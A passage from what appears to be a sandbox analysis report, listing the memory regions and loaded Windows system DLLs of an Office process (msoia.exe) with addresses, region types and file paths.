0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3373 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3374 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3375 start_va = 0x13f350000 end_va = 0x13f691fff entry_point = 0x13f350000 region_type = mapped_file name = "msoia.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoia.exe") Region: id = 3376 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3377 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3378 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3379 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3445 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3446 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3447 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3448 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3449 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3450 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 3451 start_va = 0x3c0000 end_va = 0x547fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 3452 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3453 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3454 start_va = 0x580000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3455 start_va = 0x710000 end_va = 0x1b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3456 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3457 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3458 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3459 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3460 start_va = 0x7fef79d0000 end_va = 0x7fef7bb9fff entry_point = 0x7fef79d0000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 3461 start_va = 0x7fef7bc0000 end_va = 0x7fef7df9fff entry_point = 0x7fef7bc0000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 3462 start_va = 0x7fef9d20000 end_va = 0x7fef9d22fff entry_point = 0x7fef9d20000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 3463 start_va = 0x7fef9d30000 end_va = 0x7fef9d32fff entry_point = 0x7fef9d30000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 3464 start_va = 0x7fef9d40000 end_va = 0x7fef9d42fff entry_point = 0x7fef9d40000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 3465 start_va = 0x7fef9d50000 end_va = 0x7fef9d52fff entry_point = 0x7fef9d50000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 3466 start_va = 0x7fef9d60000 end_va = 0x7fef9d64fff entry_point = 0x7fef9d60000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 3467 start_va = 0x7fef9d70000 end_va = 0x7fef9d74fff entry_point = 0x7fef9d70000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 3468 start_va = 0x7fef9d80000 end_va = 0x7fef9d82fff entry_point = 0x7fef9d80000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 3469 start_va = 0x7fef9d90000 end_va = 0x7fef9e2bfff entry_point = 0x7fef9d90000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 3470 start_va = 0x7fef9e30000 end_va = 0x7fef9e33fff entry_point = 0x7fef9e30000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 3471 start_va = 0x7fef9e40000 end_va = 0x7fef9e43fff entry_point = 0x7fef9e40000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 3472 start_va = 0x7fef9e50000 end_va = 0x7fef9e52fff entry_point = 0x7fef9e50000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 3473 start_va = 0x7fef9e60000 end_va = 0x7fef9e63fff entry_point = 0x7fef9e60000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 3474 start_va = 0x7fef9e70000 end_va = 0x7fef9e72fff entry_point = 0x7fef9e70000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 3475 start_va = 0x7fef9e80000 end_va = 0x7fef9e82fff entry_point = 0x7fef9e80000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 3476 start_va = 0x7fef9e90000 end_va = 0x7fef9e92fff entry_point = 0x7fef9e90000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3477 start_va = 0x7fef9ea0000 end_va = 0x7fef9ea2fff entry_point = 0x7fef9ea0000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 3478 start_va = 0x7fef9eb0000 end_va = 0x7fef9eb2fff entry_point = 0x7fef9eb0000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 3479 start_va = 0x7fef9ec0000 end_va = 0x7fef9ec2fff entry_point = 0x7fef9ec0000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 3480 start_va = 0x7fef9ed0000 end_va = 0x7fef9fc1fff entry_point = 0x7fef9ed0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3481 start_va = 0x7fef9fd0000 end_va = 0x7fef9fd3fff entry_point = 0x7fef9fd0000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 3482 start_va = 0x7fef9fe0000 end_va = 0x7fef9ff5fff entry_point = 0x7fef9fe0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 3483 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3484 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3485 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3486 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3487 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3488 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3489 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3490 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3491 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3492 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3493 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3494 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3495 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3496 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3497 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3498 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3530 start_va = 0x560000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 3531 start_va = 0x1b10000 end_va = 0x1ddefff entry_point = 0x1b10000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3532 start_va = 0x1de0000 end_va = 0x1de6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001de0000" filename = "" Region: id = 3533 start_va = 0x1df0000 end_va = 0x1df1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001df0000" filename = "" Region: id = 3534 start_va = 0x1e00000 end_va = 0x21f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 3535 start_va = 0x37620000 end_va = 0x3762ffff entry_point = 0x0 region_type = private name = "private_0x0000000037620000" filename = "" Region: id = 3536 start_va = 0x7febd6d0000 end_va = 0x7febd6dffff entry_point = 0x0 region_type = private name = "private_0x000007febd6d0000" filename = "" Region: id = 3716 start_va = 0x2200000 end_va = 0x2200fff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 3717 start_va = 0x2210000 end_va = 0x2210fff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 3718 start_va = 0x2220000 end_va = 0x231ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 3719 start_va = 0x2320000 end_va = 0x239cfff entry_point = 0x2320000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3720 start_va = 0x7fef97e0000 end_va = 0x7fef99fcfff entry_point = 0x7fef97e0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 3721 start_va = 0x7fef9a00000 end_va = 0x7fef9d15fff entry_point = 0x7fef9a00000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 3722 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3723 start_va = 0x2320000 end_va = 0x239cfff entry_point = 0x2320000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3724 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3725 start_va = 0x2320000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 3726 start_va = 0x2320000 end_va = 0x23fefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 3727 start_va = 0x24d0000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 3728 start_va = 0x26f0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 3729 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3919 start_va = 0x2400000 end_va = 0x2400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002400000" filename = "" Region: id = 3920 start_va = 0x2410000 end_va = 0x2410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 3921 start_va = 0x2420000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 3922 start_va = 0x2430000 end_va = 0x2430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 3923 start_va = 0x2440000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 3924 start_va = 0x2450000 end_va = 0x2451fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 3925 start_va = 0x2470000 end_va = 0x2471fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 3926 start_va = 0x25d0000 end_va = 0x26cffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 3927 start_va = 0x2850000 end_va = 0x294ffff entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 3928 start_va = 0x2950000 end_va = 0x2a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 3929 start_va = 0x2a50000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 3930 start_va = 0x2b50000 end_va = 0x2c0ffff entry_point = 0x2b50000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3931 start_va = 0x2c10000 end_va = 0x2d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 3932 start_va = 0x2d70000 end_va = 0x2e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 3933 start_va = 0x2ef0000 end_va = 0x2feffff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 3934 start_va = 0x3050000 end_va = 0x314ffff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 3935 start_va = 0x3180000 end_va = 0x327ffff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 3936 start_va = 0x3280000 end_va = 0x35c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003280000" filename = "" Region: id = 3937 start_va = 0x3670000 end_va = 0x376ffff entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 3938 start_va = 0x3930000 end_va = 0x3a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 3939 start_va = 0x777b0000 end_va = 0x777b2fff entry_point = 0x777b0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 3940 start_va = 0x7fef5270000 end_va = 0x7fef527bfff entry_point = 0x7fef5270000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3941 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3942 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3943 start_va = 0x7fef67d0000 end_va = 0x7fef6843fff entry_point = 0x7fef67d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3944 start_va = 0x7fef8b20000 end_va = 0x7fef8bbffff entry_point = 0x7fef8b20000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 3945 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3946 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3947 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3948 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3949 start_va = 0x7fefb1a0000 end_va = 0x7fefb1b4fff entry_point = 0x7fefb1a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3950 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3951 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3952 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 3953 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3954 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3955 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3956 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3957 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3958 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3959 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3960 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3961 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3962 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3963 start_va = 0x7fefdbb0000 end_va = 0x7fefdcd9fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3964 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3965 start_va = 0x7fefec10000 end_va = 0x7fefed87fff entry_point = 0x7fefec10000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3966 start_va = 0x7feff080000 end_va = 0x7feff2d8fff entry_point = 0x7feff080000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3967 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3968 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3969 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = 